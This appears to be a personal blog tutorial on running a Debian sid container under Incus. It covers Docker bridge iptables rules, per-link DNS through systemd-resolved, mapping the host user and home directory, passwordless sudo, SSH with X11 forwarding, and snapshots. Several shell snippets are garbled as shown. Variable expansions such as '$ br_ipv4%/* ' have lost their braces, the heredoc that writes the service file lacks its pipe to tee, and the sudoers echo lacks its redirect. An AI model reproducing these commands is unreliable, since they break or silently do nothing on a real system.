To create a Debian container I've used the default debian/trixie image:
incus launch images:debian/trixie debian
This command downloads the image and creates a container named debian using the default profile. The exec command can be used to run a root login shell inside the container:
incus exec debian -- su -l
Instead of exec we can use the shell alias:
incus shell debian
which does the same as the previous command. Inside that shell we can try to update the machine to sid by changing the /etc/apt/sources.list file and using apt:
root@debian:~# echo "deb http://deb.debian.org/debian sid main contrib non-free" \
  >/etc/apt/sources.list
root@debian:~# apt update
root@debian:~# apt dist-upgrade
As my machine has docker installed, the apt update command fails because the network does not work; to fix it I've executed the commands of the following section and re-run the apt update and apt dist-upgrade commands.

Making the incusbr0 bridge work with Docker

To avoid problems with docker networking we have to add rules for the incusbr0 bridge to the DOCKER-USER chain as follows:
sudo iptables -I DOCKER-USER -i incusbr0 -j ACCEPT
sudo iptables -I DOCKER-USER -o incusbr0 -m conntrack \
  --ctstate RELATED,ESTABLISHED -j ACCEPT
That makes things work now, but to make things persistent across reboots we need to add them each time the machine boots. As suggested by the incus documentation I've installed the iptables-persistent package (my command also purges the ufw package, as I was not using it) and saved the current rules when installing:
sudo apt install iptables-persistent --purge
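If the rules are changed later they can be saved again using the netfilter-persistent command provided by the package:
sudo netfilter-persistent save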

Integrating the DNS resolution of the container with the host

To make DNS resolution for the incus containers work from the host I've followed the incus documentation. To set up things manually I've run the following:
br="incusbr0";
br_ipv4="$(incus network get "$br" ipv4.address)";
br_domain="$(incus network get "$br" dns.domain)";
dns_address="$ br_ipv4%/* ";
dns_domain="$ br_domain:=incus ";
resolvectl dns "$br" "$ dns_address ";
resolvectl domain "$br" "~$ dns_domain ";
resolvectl dnssec "$br" off;
resolvectl dnsovertls "$br" off;
And to make the changes persistent across reboots I've created the following service file:
sh -c "cat <<EOF   sudo tee /etc/systemd/system/incus-dns-$ br .service
[Unit]
Description=Incus per-link DNS configuration for $ br 
BindsTo=sys-subsystem-net-devices-$ br .device
After=sys-subsystem-net-devices-$ br .device
[Service]
Type=oneshot
ExecStart=/usr/bin/resolvectl dns $ br  $ dns_address 
ExecStart=/usr/bin/resolvectl domain $ br  ~$ dns_domain 
ExecStart=/usr/bin/resolvectl dnssec $ br  off
ExecStart=/usr/bin/resolvectl dnsovertls $ br  off
ExecStopPost=/usr/bin/resolvectl revert $ br 
RemainAfterExit=yes
[Install]
WantedBy=sys-subsystem-net-devices-$ br .device
EOF"
And enabled it:
sudo systemctl daemon-reload
sudo systemctl enable --now incus-dns-${br}.service
If all goes well the DNS resolution works from the host:
$ host debian.incus
debian.incus has address 10.149.225.121
debian.incus has IPv6 address fd42:1178:afd8:cc2c:216:3eff:fe2b:5cea

Using my host user and home dir inside the container

To use my host user and home directory inside the container I need to add the user and group to the container. First I've added my user group with the same GID used on the host:
incus exec debian -- addgroup --gid "$(id --group)" --allow-bad-names \
  "$(id --group --name)"
Once I have the group I've added the user with the same UID and GID as on the host, without defining a password for it:
incus exec debian -- adduser --uid "$(id --user)" --gid "$(id --group)" \
  --comment "$(getent passwd "$(id --user --name)" | cut -d ':' -f 5)" \
  --no-create-home --disabled-password --allow-bad-names \
  "$(id --user --name)"
Once the user is created we can mount the home directory on the container (we add the shift option to make the container use the same UID and GID as we do on the host):
incus config device add debian home disk source=$HOME path=$HOME shift=true
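To check that the mapping works we can list the directory from inside the container; with the shift option the files should show up owned by our own UID and GID instead of unmapped ones:
incus exec debian -- ls -ld "$HOME"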
We already have the shell alias to log in with the root account; now we can add another one to log into the container using the newly created user:
incus alias add ush "exec @ARGS@ -- su -l $(id --user --name)"
To log into the container as our user now we just need to run:
incus ush debian
To be able to use sudo inside the container we could add our user to the sudo group:
incus exec debian -- adduser "$(id --user --name)" "sudo"
But that requires a password and we don't have one, so instead we are going to add a file to the /etc/sudoers.d directory to allow our user to run sudo without a password:
incus exec debian -- \
  sh -c "echo '$(id --user --name) ALL = NOPASSWD: ALL' /etc/sudoers.d/user"

Accessing the container using ssh

To use the container as a real machine and log into it as I do on remote machines I've installed the openssh-server package and authorized my laptop public key to log into my laptop (as we are mounting the home directory from the host, that allows us to log in without a password from the local machine). Also, to be able to run X11 applications from the container I've adjusted the $HOME/.ssh/config file to always forward X11 (option ForwardX11 yes for Host debian.incus) and installed the xauth package. After that I can log into the container running the command ssh debian.incus and start using it after installing other interesting tools like neovim, rsync, tmux, etc.

Taking snapshots of the container

As this is a system container we can take snapshots of it using the incus snapshot command; that can be especially useful before doing a dist-upgrade, so we can roll back if something goes wrong. To create a snapshot we use the create subcommand:
incus snapshot create debian
The snapshot subcommands include options to list the available snapshots, restore a snapshot, delete a snapshot, etc.
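For example, to list the existing snapshots and restore the one created above (incus names snapshots snap0, snap1, ... by default, although a name can be passed to create) we would run:
incus snapshot list debian
incus snapshot restore debian snap0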

Conclusion

Since last week I have a terminal running a tmux session on the Debian Sid container with multiple zsh windows open (I've changed the prompt to be able to notice easily where I am) and it is working as expected. My plan now is to add some packages and use the container for personal projects so I can work on a Debian Sid system without having to reinstall my work machine. I'll probably write more about it in the future, but for now, I'm happy with the results.
